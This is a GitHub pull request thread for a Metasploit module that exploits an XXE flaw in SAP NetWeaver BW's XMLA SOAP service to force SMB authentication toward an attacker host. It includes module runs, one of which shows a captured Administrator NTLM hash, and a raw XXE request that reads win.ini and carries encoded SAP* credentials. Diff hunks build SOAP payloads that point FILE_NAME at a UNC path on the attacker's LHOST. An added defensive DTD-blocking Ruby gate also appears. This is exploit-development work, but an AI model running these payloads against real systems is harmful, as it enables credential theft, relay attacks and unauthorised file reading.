
SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay #1656

Merged
merged 2 commits into from

2 participants

@nmonkee

This module exploits the SAP NetWeaver BW XML External Entity vulnerability. An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function. The XXE vulnerability in SAP BW can lead to arbitrary file reading or an SMBRelay attack.

SAP Note 1597066 / DSECRG-12-033.

ref: http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity

@jvazquez-r7
Collaborator

Trying to run it against a Windows installation results in the following error:

msf auxiliary(sap_soap_xmla_bw_smb_relay) > show options

Module options (auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CLIENT   001              yes       SAP client
   PASS     06071992         yes       Password
   PATH     c:\foo.txt       yes       File path (e.g. \xx.xx.xx.xx\share)
   Proxies                   no        Use a proxy chain
   RHOSTS   192.168.172.186  yes       The target address range or CIDR identifier
   RPORT    8000             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   USER     SAP*             yes       Username
   VHOST                     no        HTTP server virtual host

msf auxiliary(sap_soap_xmla_bw_smb_relay) > run

[*] [SAP] 192.168.172.186:8000 - sending request for c:\foo.txt
[-] [SAP] 192.168.172.186:8000 - Error code: 200
[-] [SAP] 192.168.172.186:8000 - Error title: OK
[-] [SAP] 192.168.172.186:8000 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Inconsistent input parameter (parameter: METHOD, value &lt;unknown&gt;)" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7
Collaborator

And test results on Linux, again with no access to file contents:

msf auxiliary(sap_soap_xmla_bw_smb_relay) > show options

Module options (auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CLIENT   001              yes       SAP client
   PASS     06071992         yes       Password
   PATH     /etc/passwod     yes       File path (e.g. \xx.xx.xx.xx\share)
   Proxies                   no        Use a proxy chain
   RHOSTS   192.168.172.179  yes       The target address range or CIDR identifier
   RPORT    8042             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   USER     SAP*             yes       Username
   VHOST                     no        HTTP server virtual host

msf auxiliary(sap_soap_xmla_bw_smb_relay) > run

[*] [SAP] 192.168.172.179:8042 - sending request for /etc/passwod
[-] [SAP] 192.168.172.179:8042 - Error code: 200
[-] [SAP] 192.168.172.179:8042 - Error title: OK
[-] [SAP] 192.168.172.179:8042 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Request transfered is not a valid XML/SOAP document" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7
Collaborator

Any clues? Am I doing something wrong to test this module?

@nmonkee

works fine:


msf  auxiliary(sap_soap_xmla_bw_smb_relay) > run
[*] [SAP] 192.168.1.86:8000 - sending request for \\192.168.1.71\share
[*] SMB Captured - 2013-05-09 22:31:02 +0100
NTLMv1 Response Captured from 192.168.1.86:51291 - 192.168.1.86 
USER:Administrator DOMAIN:GATEWAY OS: LM:
LMHASH:Disabled 
NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4
[*] [SAP] 192.168.1.86:8000 - Error code: 200
[*] [SAP] 192.168.1.86:8000 - Error title: OK
[*] [SAP] 192.168.1.86:8000 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Request transfered is not a valid XML/SOAP document" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7
Collaborator

It's just the SMB relay part; isn't the XXE expansion vuln working? I don't see this module as complete if we can't read arbitrary remote files.

@nmonkee

"An attacker can attempt to generate a "denial of service" situation or start an "SMB relay attack" using Document Type Definitions (DTD) via the SOAP/XMLA interface."

ref: https://service.sap.com/sap/support/notes/1597066

Any file read attempt results in error: "Request transfered is not a valid XML/SOAP document". I think this is a red herring as far as arbitrary file read goes. Unless there is some trick I'm not aware of or haven't tried.


POST /sap/bw/xml/soap/xmla?sap-client=001&sap-language=EN HTTP/1.0
Host: 10.0.7.19:8000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sap-usercontext=sap-language=EN&sap-client=001
Authorization: Basic U0FQKjowNjA3MTk5Mg==
Content-Type: text/xml; charset=UTF-8
Content-Length: 126

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE request
[ 
<!ENTITY include SYSTEM "file:///c:/windows/win.ini">
>]
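
An added example, not code from the Metasploit module or from SAP: a Ruby pre-parse gate that a SOAP/XMLA front end or reverse proxy could apply to inbound bodies, refusing any DOCTYPE before the XML parser sees it and classifying each external entity target (local file, UNC path, remote URL) for alerting. The sample bodies are constructed; the XXE one repeats the DTD from the request above, the UNC one uses an RFC 5737 documentation address, and the benign one is a minimal XMLA Discover envelope.

```ruby
# Added example (not the Metasploit module's or SAP's code): a pre-parse gate
# for inbound SOAP/XMLA bodies. SAP Note 1597066 frames the bug as DTD abuse over
# the interface, so the gate refuses any DOCTYPE and classifies entity targets.
ENTITY_RE = /<!ENTITY\s+(%\s+)?([^\s%>]+)\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]*)"/i

# Map an external entity's system identifier to the risk it represents.
def classify_entity_target(uri)
  case uri
  when %r{\A\\\\[^\\]+\\}i, %r{\Afile:////}i, %r{\Afile://[^/]}i
    'unc-path (outbound SMB authentication, relay risk)'
  when %r{\Afile:}i then 'local-file (arbitrary file read)'
  when %r{\A(?:https?|ftp):}i then 'remote-url (out-of-band request)'
  else 'other'
  end
end

# Returns { allowed:, findings: }; bodies without a DTD pass, any DOCTYPE is refused.
def inspect_xml_body(body)
  findings = []
  findings << 'DOCTYPE declaration present' if body =~ /<!DOCTYPE\b/i
  body.scan(ENTITY_RE) do |param, name, uri|
    kind = param ? 'parameter entity' : 'entity'
    findings << "#{kind} #{name} -> #{classify_entity_target(uri)}"
  end
  { allowed: findings.empty?, findings: findings }
end

# Constructed samples. XXE_REQUEST repeats the DTD from the thread; UNC_REQUEST
# uses an RFC 5737 documentation address; BENIGN_REQUEST is a minimal XMLA Discover.
XXE_REQUEST = <<~'XML'
  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE request [
  <!ENTITY include SYSTEM "file:///c:/windows/win.ini">
  ]>
XML
UNC_REQUEST = <<~'XML'
  <!DOCTYPE request [ <!ENTITY s SYSTEM "\\192.0.2.10\share"> ]>
XML
BENIGN_REQUEST = <<~'XML'
  <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Body><Discover xmlns="urn:schemas-microsoft-com:xml-analysis"/></SOAP-ENV:Body>
  </SOAP-ENV:Envelope>
XML
if __FILE__ == $0
  { 'benign' => BENIGN_REQUEST, 'xxe' => XXE_REQUEST, 'unc' => UNC_REQUEST }.each do |label, body|
    r = inspect_xml_body(body)
    puts "#{label}: #{r[:allowed] ? 'ALLOW' : 'BLOCK'} #{r[:findings].join('; ')}"
  end
end
```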

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework
Merged

SAP SMB Relay Abuses #11

@jvazquez-r7 jvazquez-r7 merged commit 1128663 into from
@jvazquez-r7
Collaborator

@nmonkee shared pcaps from the SMB relay attacks for verification. Looks good. Merged after a little final cleanup:

d9bdf3d

Showing with 9 additions and 9 deletions.
  1. +9 −9 modules/auxiliary/scanner/sap/sap_smb_relay.rb
18 modules/auxiliary/scanner/sap/sap_smb_relay.rb
@@ -195,19 +195,19 @@ def run_clba_classif_file_remote
smb_uri = "\\\\#{datastore['LHOST']}\\#{Rex::Text.rand_text_alpha_lower(7)}.#{Rex::Text.rand_text_alpha_lower(3)}"
data = '<?xml version="1.0" encoding="utf-8" ?>'
- data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
- data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
+ data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
+ data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'
data << '<SOAP-ENV:Header/>'
data << '<SOAP-ENV:Body>'
- data << '<n1:CLBA_CLASSIF_FILE_REMOTE_HOST xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
+ data << '<CLBA_CLASSIF_FILE_REMOTE_HOST xmlns="urn:sap-com:document:sap:rfc:functions">'
data << '<CLASSIF_FILE>'
data << '<item>'
data << '<ZEILE>a</ZEILE>'
data << '</item>'
data << '</CLASSIF_FILE>'
data << '<FILE_NAME>' + smb_uri + '</FILE_NAME>'
- data << '</n1:CLBA_CLASSIF_FILE_REMOTE_HOST>'
+ data << '</CLBA_CLASSIF_FILE_REMOTE_HOST>'
data << '</SOAP-ENV:Body>'
data << '</SOAP-ENV:Envelope>'
send_soap_rfc_request(data, smb_uri)
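Review bot: the removed `<n1:CLBA_CLASSIF_FILE_REMOTE_HOST ... env:encodingStyle=...>` line used an `env:` prefix that the Envelope never declares (it declares SOAP-ENV, soap, xsd, xsi, m0 and SOAP-ENC), so the old request was not namespace-well-formed; the replacement with a default `xmlns="urn:sap-com:document:sap:rfc:functions"` fixes that, and a one-line comment saying so would help, because the two replaced Envelope lines above it render identically here and the only change there is whitespace. While touching this block, the unused `soap`, `xsd`, `xsi` and `m0` declarations on the Envelope could be dropped.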
@@ -217,23 +217,23 @@ def run_clba_update_file_remote
smb_uri = "\\\\#{datastore['LHOST']}\\#{Rex::Text.rand_text_alpha_lower(7)}.#{Rex::Text.rand_text_alpha_lower(3)}"
data = '<?xml version="1.0" encoding="utf-8" ?>'
- data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
- data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
+ data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
+ data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'
data << '<SOAP-ENV:Header/>'
data << '<SOAP-ENV:Body>'
- data << '<n1:CLBA_UPDATE_FILE_REMOTE_HOST xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
+ data << '<CLBA_UPDATE_FILE_REMOTE_HOST xmlns="urn:sap-com:document:sap:rfc:functions">'
data << '<DATA_TAB>'
data << '<item>'
data << '<TABNAME>a</TABNAME>'
- data << '<NUMBER>0</NUMBER>'
+ data << '<NUMMER>0</NUMMER>'
data << '<TEXT>a</TEXT>'
data << '<COLOR>a</COLOR>'
data << '<DATA>a</DATA>'
data << '</item>'
data << '</DATA_TAB>'
data << '<FILE_NAME>' + smb_uri + '</FILE_NAME>'
- data << '</n1:CLBA_UPDATE_FILE_REMOTE_HOST>'
+ data << '</CLBA_UPDATE_FILE_REMOTE_HOST>'
data << '</SOAP-ENV:Body>'
data << '</SOAP-ENV:Envelope>'
send_soap_rfc_request(data, smb_uri)
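Review bot: the `<NUMBER>0</NUMBER>` to `<NUMMER>0</NUMMER>` rename inside the DATA_TAB item will read as a typo to anyone skimming; since the rename implies the RFC's field really is spelled NUMMER, add a short comment saying so to keep a later cleanup from "correcting" it back. The namespace change mirrors the previous hunk (undeclared `env:` prefix replaced by a default namespace) and repeats the same whitespace-only Envelope lines; a small helper that emits the shared Envelope/Header preamble for both CLBA_* functions would remove the duplicated string literals.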